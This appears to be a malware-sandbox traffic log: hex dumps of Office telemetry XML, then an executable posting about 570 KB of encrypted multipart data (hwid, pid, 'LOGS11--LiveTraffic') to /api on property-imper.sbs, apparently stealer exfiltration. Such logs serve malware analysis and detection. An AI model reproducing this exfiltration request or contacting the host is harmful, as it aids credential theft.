                                                                                                                                                                          2024-11-23 18:01:23 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                          Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                          Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                          Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                          Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                          Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                          Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                          2024-11-23 18:01:24 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          8192.168.2.549713172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:24 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=CEDD68MRAWUWL8GY
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 570100
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: 2d 2d 43 45 44 44 36 38 4d 52 41 57 55 57 4c 38 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 37 41 34 46 43 34 41 33 37 45 39 46 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 43 45 44 44 36 38 4d 52 41 57 55 57 4c 38 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 45 44 44 36 38 4d 52 41 57 55 57 4c 38 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                          Data Ascii: --CEDD68MRAWUWL8GYContent-Disposition: form-data; name="hwid"BA7A4FC4A37E9FACD7CBBD6DF28D3732--CEDD68MRAWUWL8GYContent-Disposition: form-data; name="pid"1--CEDD68MRAWUWL8GYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: 05 9a e4 04 d0 ac 30 70 19 04 fe 2a ad 18 44 82 17 f6 52 b5 b3 ad c4 ea da 5b 33 16 e9 fe bc bf 5f 08 82 8f bf 2b cb 5f a9 c1 38 0f 0f ea 79 4b fe 8c f1 ff 42 6a d2 97 3d 3b 11 26 a5 fd 2f bf fb 8f 54 fb 79 fd 72 7f ee cf 0f f4 aa f0 40 76 45 9a ee 2c ba c2 4a 2e b2 1a 77 fe 07 50 9a 1e ff bf db 4d fe ef 03 3c 44 07 e0 cc 14 05 5a 09 84 7e 43 58 b0 f1 41 fb 68 46 4d 26 28 8c 77 12 bd d0 d0 6f 17 92 fd 98 fb 33 46 08 e9 4f 65 bd 4e db 11 00 52 8d b4 60 78 7c b0 17 ec 8c 81 1e 7b 43 fa ae ec 3d 3d cd c1 18 77 5a a3 3c ee f8 aa b3 1c ea 72 85 73 c7 6e db bc 05 d4 12 29 01 e1 f6 51 89 c2 4c 5f f3 d8 43 ed 9c 48 3a 3a 89 eb 75 2f 45 f4 08 e7 7a 3b 0a 02 bf 5f 99 4e ee a7 35 4e 9f a2 73 7b 7e 50 43 75 fb bc 89 0b 9b 34 d1 73 63 62 07 d4 05 65 c3 bf 7d 03 48 04
                                                                                                                                                                          Data Ascii: 0p*DR[3_+_8yKBj=;&/Tyr@vE,J.wPM<DZ~CXAhFM&(wo3FOeNR`x|{C==wZ<rsn)QL_CH::u/Ez;_N5Ns{~PCu4scbe}H
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: b0 6a ed 12 85 bd 60 bf 8b 14 60 21 00 ee 50 d5 c3 e5 d1 00 1f 62 c2 a3 95 78 8d 1c d1 bd 0c 4f b1 b9 f6 91 c4 9f 29 55 36 a2 32 f3 3a d4 39 ab 11 6c 8e e2 b2 bf d1 76 6e 08 75 de d0 0f 41 df 25 f8 a4 3a 56 aa 61 e1 97 11 e3 99 7d 49 78 f6 f3 0a 7f 0b 6d 90 56 1a 66 89 a0 e5 15 22 00 5b 0f bb 33 28 cc 7a 00 e8 56 06 ff 9b 64 e7 80 a5 1f 20 b3 10 e4 7e 49 39 78 b6 89 22 c8 75 7b 92 ff df be ed f2 a9 e2 c9 e6 0a 90 00 90 44 de f3 b9 cf 13 07 22 bb 34 64 50 90 00 eb 83 b8 e8 a4 48 07 70 de 09 67 29 8e 48 3b 40 87 42 2f 80 81 c7 d5 4c 8f 62 8b 82 57 cd f9 97 4e dd 9b 87 5d 30 58 93 6d bb 2b bb af 20 6e a8 cb 80 07 98 a5 7b a3 85 69 0e d9 a8 6e 33 38 26 68 36 22 3d 65 48 db 51 c5 58 c6 47 bd f9 ae 9a d0 71 bc c4 47 dc 10 3c f8 30 13 f5 5a a9 58 8f 52 b0 b7 c5
                                                                                                                                                                          Data Ascii: j``!PbxO)U62:9lvnuA%:Va}IxmVf"[3(zVd ~I9x"u{D"4dPHpg)H;@B/LbWN]0Xm+ n{in38&h6"=eHQXGqG<0ZXR
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: bf cb 40 dd 76 0e 1f f9 a8 bc 9e e5 92 10 ff 4b 03 a9 e1 33 88 8e 51 e8 ce d0 30 5b fd 25 6f c7 4b b8 32 91 3a 91 66 59 a3 9e 12 ee d2 e9 3a 76 69 2b d9 57 a4 1d a3 f1 a7 0f 4b ec e6 78 2a 88 1d 49 4d 63 79 d4 ee 4e f7 70 76 8a d8 21 b2 69 a1 82 7c 55 2b 72 f5 0c 5d 15 b5 63 4f 6a 62 b2 3a 6b 62 66 be 9a 95 c9 20 4f 34 a4 ff c5 85 0f a1 fa 13 bf 6d d9 0f 32 d2 65 c2 2f 97 09 d4 57 6e 31 d7 47 c6 62 66 f8 a9 ed 84 af 0d 67 bf 6e 76 7c d1 d8 77 4b 92 96 ba f4 2a 2d 3d c4 0c 81 80 a0 98 58 99 02 1b c4 85 6b 0b 28 72 18 04 31 65 c0 55 ac ae 24 44 d4 d2 28 50 7f 68 72 fd fc a8 e9 9e a3 a0 97 1f a3 9a ca 31 cf 07 19 14 ea e5 1f a6 15 e1 5f f5 73 4a ff f4 35 d4 b9 fd 41 1e 74 d5 61 3f ac 67 3d db f3 5e 0c 58 5e 01 96 98 b2 8f 80 2a b9 ee ee 7a 20 43 0d 14 c6 ff
                                                                                                                                                                          Data Ascii: @vK3Q0[%oK2:fY:vi+WKx*IMcyNpv!i|U+r]cOjb:kbf O4m2e/Wn1Gbfgnv|wK*-=Xk(r1eU$D(Phr1_sJ5Ata?g=^X^*z C
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: f5 7a 03 12 17 f1 06 82 ed 88 aa cf 52 e4 cc 90 b8 ae 56 5b 2e c0 c3 29 33 07 c9 39 55 52 bd bc 6b ec 20 05 3a 8a a2 fb e1 55 42 3c 5e 86 af 24 0f 5f 67 48 13 e8 ba 99 ef cf 8c be 1a 6d c6 84 15 de 56 b9 f8 a8 24 e2 33 5a 77 72 16 99 53 04 17 fe c1 87 40 97 bb 79 a8 d8 d6 8c 2a 01 41 68 0c 53 8e 8e 40 91 55 11 3f 6f 16 98 07 1c 2f 39 ad d1 1c e2 b7 1e 6d 4f 6e b5 e9 fe 02 11 d0 f7 c5 41 c7 af ec 35 a0 1c 4d b9 d7 ea ea 44 5b e9 d4 d5 70 db ea 9b 56 77 56 30 49 af c3 b7 f0 46 e9 ca c0 56 c5 bf 14 c2 80 40 2e 68 d7 06 03 c5 0f ba 66 b8 9b 14 9c 15 80 fc e8 c8 a0 8d c2 f7 16 8e d2 a1 37 f5 56 03 e1 9e 7f 27 33 ec 0b 2d f9 39 76 e0 fa 69 02 16 ed ba c2 0d 29 38 90 00 29 16 21 c2 8f d8 f9 b9 1f 83 c1 dc 84 6b 0b ea d0 52 58 68 64 64 10 39 dc 6f 53 b3 9f 8f 6a
                                                                                                                                                                          Data Ascii: zRV[.)39URk :UB<^$_gHmV$3ZwrS@y*AhS@U?o/9mOnA5MD[pVwV0IFV@.hf7V'3-9vi)8)!kRXhdd9oSj
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: 47 05 5f 7b 34 aa 31 40 e2 e0 13 86 e4 9a b5 fe 36 23 bb 04 e2 28 e7 59 6a 9c 8f 34 e3 5b db a8 ad a9 59 6a 0b 6a 99 66 e7 04 2f a5 47 a5 0b 4c 3e 62 fc ac 46 f4 ff 59 4a 5f 4c a5 95 6b bc a3 4a 68 29 db d6 23 db ac ce 48 45 d1 35 4a e2 57 1c fd 71 cb 8a 7d a2 95 95 62 b6 d2 40 42 b6 88 48 b2 f4 db 89 af 1f 0b 5b 78 25 3f 15 c3 80 5d ab 79 eb db bd f4 5b dc 17 8e 8d b5 61 8c e9 ad 6f 95 f0 34 ae 43 1f 76 e2 78 28 b3 aa 24 1e ca df 57 25 f1 35 44 7c 67 7f fe 53 a8 ce d8 19 57 f7 be 97 e0 4b 3a ea bb d5 ed e6 9c 26 f9 70 4d 12 c5 f8 bb 65 e1 5b 70 c5 96 dd 06 33 c7 32 44 7c 24 ee 12 b8 32 9c 88 fa 48 be 70 7a 22 53 1d 0f cd c6 8c da e6 d4 44 71 dd 23 52 38 1a e7 59 e6 10 42 c8 c8 81 3c 85 cd ba 8b ca 80 b0 36 d8 f5 f3 96 21 3b c3 7d dd 72 c8 55 01 44 1d e9
                                                                                                                                                                          Data Ascii: G_{41@6#(Yj4[Yjjf/GL>bFYJ_LkJh)#HE5JWq}b@BH[x%?]y[ao4Cvx($W%5D|gSWK:&pMe[p32D|$2Hpz"SDq#R8YB<6!;}rUD
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: 32 49 8d ba 69 f1 68 75 7e 60 66 75 bb bc 66 bb 4f 35 81 d1 cd cd 67 88 76 56 87 dc c0 01 b3 64 43 41 b1 17 62 e0 47 54 96 4a dc 00 43 0b 44 4c ed 2d 3f 8b 03 3b 44 50 b2 81 57 5b b2 8f 9b ca da d3 67 4c 48 77 03 6c 2b 57 b3 97 f3 f4 b3 b8 2b ae db 2f 2f 43 60 7d f6 6f de d9 bf 88 40 c7 00 c9 10 3a dd c9 3d 0f 47 13 38 8b 8f 67 db 89 27 47 4e cf 51 34 71 b7 97 d6 c2 3b 25 2f 9c 71 be 9f 63 81 17 a9 5c 5a be 19 c0 cf b9 2b 77 5b e6 98 90 d5 97 8b 5a cb ce dc ab 8f 1a 3d 75 46 37 93 43 07 7b 46 d0 85 d6 17 7c 6b 6d 72 c7 b7 e4 1f f4 2c 7c 84 90 e2 35 80 62 8d af fd 08 d9 8f 8d b5 d4 69 60 18 da b5 02 b6 a1 b3 c8 ff 2e 41 8c 77 d9 b9 ec 48 15 69 78 2c a3 09 f7 3f d0 c5 04 4c fc 48 cd 19 27 f8 0e c8 0a 06 97 76 23 01 41 b4 39 68 6b 8c 51 07 fc fa c0 7c 67 61
                                                                                                                                                                          Data Ascii: 2Iihu~`fufO5gvVdCAbGTJCDL-?;DPW[gLHwl+W+//C`}o@:=G8g'GNQ4q;%/qc\Z+w[Z=uF7C{F|kmr,|5bi`.AwHix,?LH'v#A9hkQ|ga
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: 9e 7f 86 e4 2d 7f 17 26 32 d1 b0 00 86 7f 51 06 dd 35 31 39 ef c6 b2 1d 88 d1 57 d2 82 4c c4 fb 4a a7 cf 37 b8 2a 67 cf 4f a4 9b 38 28 5e 56 7e ae 3f af d6 e1 96 60 5b af 24 1f a1 7b 59 38 89 a7 09 f9 85 36 12 b6 b7 9c 76 99 b4 4c 1c 09 ef c7 07 b9 43 d9 95 ab 6a e5 3f b1 c5 8f 23 c7 ee 9b e9 47 f0 40 6f 86 ba 47 46 54 e9 5f 89 dc cc a0 d2 67 7e 7f 4a bc bf 45 66 a8 06 bd 91 24 d3 7b c5 05 bb 7f 67 da 4a bc 3f 5d 5e 49 4f 11 24 fb 9c fe fd e7 6e 08 08 76 f6 f3 61 c0 23 e5 cc c7 ae c8 ec 44 ea ed 79 4d 76 8d 38 d7 d3 bf ec 49 9d 77 c5 0d 9e 96 c3 ea d1 57 fa 96 c7 4c 21 bb e3 ee f6 d7 b9 ff 7e af 78 1c a5 d1 2d 59 27 08 ef e5 78 33 58 18 dc ad 55 f1 70 fc f9 ad ec 30 e3 48 09 7d d4 6a 6d 2d d2 66 ce ad f9 4e de 5a 0e 22 13 01 46 16 da 31 9a fe 9e 91 87 35
                                                                                                                                                                          Data Ascii: -&2Q519WLJ7*gO8(^V~?`[${Y86vLCj?#G@oGFT_g~JEf${gJ?]^IO$nva#DyMv8IwWL!~x-Y'x3XUp0H}jm-fNZ"F15
                                                                                                                                                                          2024-11-23 18:01:24 UTC15331OUTData Raw: 21 d6 47 d7 fa 6e 6c d6 68 e6 f1 07 ba 1e 5f 6d b4 8d 1d 65 3c 50 94 6f ab 21 7a 8c 1d c6 45 ab 76 01 ee e4 7c d4 49 3c 5c 74 bb 63 ae 9e 6d e1 9e 9d 88 3b b0 53 1e 61 be c2 bc c6 83 a8 2a 64 e5 cb 9f e3 a4 91 52 08 89 e3 c2 5f c6 e9 fa 27 8e 8b 68 38 c2 b2 73 57 c7 6c 23 08 a3 b5 02 dc 5b c0 e6 ab b1 04 40 70 de 8c 5a a3 2d 08 b0 8b b7 48 f6 f1 c8 df 6b 27 6d b3 d1 31 6b e1 76 66 f5 77 31 94 b4 0d 4c cc f8 90 2e 46 ab 15 91 90 44 6c 65 22 59 c8 d9 9f 7f e3 e4 87 f9 3e 7e 27 1f 8f 8d 32 a3 30 9f 89 33 ce 61 f3 08 c5 65 5b 89 ca 4b 5f 27 35 db 1b 57 15 75 5e ed a0 a2 22 6e 4b 11 fa c2 df 1d c6 7b 02 d8 5f e4 d0 d1 56 e6 94 7e db cf 56 d2 93 5d 32 f7 cd 55 26 cf f5 e4 92 3b 2a 39 1f 8f e9 d2 48 be 5b a2 9b 6f 0e 74 28 ea 29 e1 13 eb d3 14 ec 30 84 fb df 6a
                                                                                                                                                                          Data Ascii: !Gnlh_me<Po!zEv|I<\tcm;Sa*dR_'h8sWl#[@pZ-Hk'm1kvfw1L.FDle"Y>~'203ae[K_'5Wu^"nK{_V~V]2U&;*9H[ot()0j
